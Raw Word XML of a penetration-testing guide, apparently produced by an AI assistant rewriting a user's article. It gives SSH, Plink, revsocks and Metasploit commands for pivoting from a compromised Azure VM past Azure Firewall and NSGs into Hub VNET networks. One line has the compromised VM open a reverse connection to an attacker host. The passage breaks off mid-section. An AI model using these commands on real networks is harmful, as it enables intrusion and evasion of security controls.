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287F" w14:textId="225E7CF8" w:rsidR="00F41B33" w:rsidRDefault="002533AB">
      <w:r>
        <w:t>Azure-pentest-dynamic-ssh-tunnelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1F753" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB"/>
    <w:p w14:paraId="6782CC0F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB"/>
    <w:p w14:paraId="21928A21" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD2691">
        <w:t>Dynamic SSH Tunnelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9C66B" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="10CDB3B7" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="3E7439D7" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">Here is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rewritten, corrected, and Azure-specific version</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> of your tunneling techniques article, adapted to penetration testing scenarios involving </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Firewall, DMZs, and Hub-Spoke VNET topologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBB617" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="37D4B7F8">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E540B0" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacking Azure: Tunneling &amp; Port Forwarding Techniques in Hub-Spoke/DMZ Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF597C" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">In Azure environments, attackers often land on a compromised Virtual Machine (VM) in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spoke VNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DMZ subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">. To pivot deeper into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hub VNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> or internal networks protected by </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>, various tunneling techniques can be used for lateral movement and exfiltration, while bypassing network security boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3048B0B5" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">This guide outlines </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH tunneling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse proxy tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>covert channels</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> (like DNS and ICMP tunneling) in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure penetration testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAFCE3E" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="76A26B26">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46880D18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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dynamic SSH Tunneling (SOCKS Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B3333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>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6798116D" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">You're inside a Linux VM within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DMZ subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> and want to browse internal services inside the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hub VNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE18400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>Technique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991C214" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>ssh -D 7000 azureuser@10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF3716" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>-D 7000: Creates a local SOCKS5 proxy on port 7000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380F4D9" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">Configure your browser on </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> or attacker host to use SOCKS5 127.0.0.1:7000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E08F6" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Use proxychains or manual browser proxy to reach internal IPs (e.g., 10.1.0.10:443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EAC74A" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">: Bypass </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> egress rules by relaying traffic through an allowed SSH port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC60E3" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="4FF58AA3">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DB9BB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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔃</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB2FE6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>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C952DD" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>You want to access an internal Azure service (e.g., internal web server on port 80) reachable only by a compromised VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CA6A0" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>ssh -L 8080:10.1.0.10:80 azureuser@10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1126C3" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Maps localhost:8080 to 10.1.0.10:80 via SSH tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608CA20" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Access the internal web server through http://127.0.0.1:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F0BD0" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">: Pivot into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>private Hub VNET services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> while evading NSGs or firewall constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4EA67" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="19D4768B">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9141F7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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Local Port Forwarding (Plink on Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C84AF" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Plink.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> (PuTTY CLI) for local forwarding in Azure VM on Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B1341" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>plink.exe -L 8080:10.1.0.10:80 azureuser@10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E6ABF" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> Ideal for Windows jump boxes inside the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hub VNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bastion DMZs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7991FBD2" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="06D4787C">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076B0B4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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dynamic Port Forwarding with Plink (SOCKS Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465EEB1" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>plink.exe -D 8000 azureuser@10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582B52C" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Acts as a SOCKS5 proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D2DA8" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Configure browser/proxychains to route traffic through 127.0.0.1:8000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D433F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="201ED330">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89B116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 xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌀</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reverse SOCKS Proxy with Revsocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B73BB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>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73A57F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve">You're on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows attack VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> and want to proxy through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux VM in Azure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> to reach internal targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A0EDCE" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Attacker (Windows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CFA445" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>revsocks_windows_amd64.exe -listen :8443 -socks 0.0.0.0:1080 -pass test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DDB9E4" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Azure Linux VM (Ubuntu in DMZ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D313CF7" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>./revsocks_linux_amd64 -connect YOUR_PUBLIC_IP:8443 -pass test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCA11A" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:lastRenderedPageBreak/>
        <w:t>Set browser or proxychains to 127.0.0.1:1080 SOCKS5 proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABD4654" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Reach internal subnets (e.g., Hub VNET 10.1.0.0/16) from the outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FBCEF" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> Evades NSGs by establishing reverse connection from trusted Azure VM to external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A401469" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="59989D5F">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BD616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 xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit SOCKS Proxy &amp; Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930F0F2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>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05983D93" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>You gain Meterpreter access on an Azure VM. You want to route traffic into internal segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7ED2B8" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>use post/multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866BE06" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>set subnet 10.1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894DC92" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DEB890" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="285B38E4" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>use auxiliary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA24EBB" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>set srvhost 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B335D9" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>set srvport 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D259E79" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D5D3A" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Use proxychains through Metasploit’s proxy to access internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E48AB" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
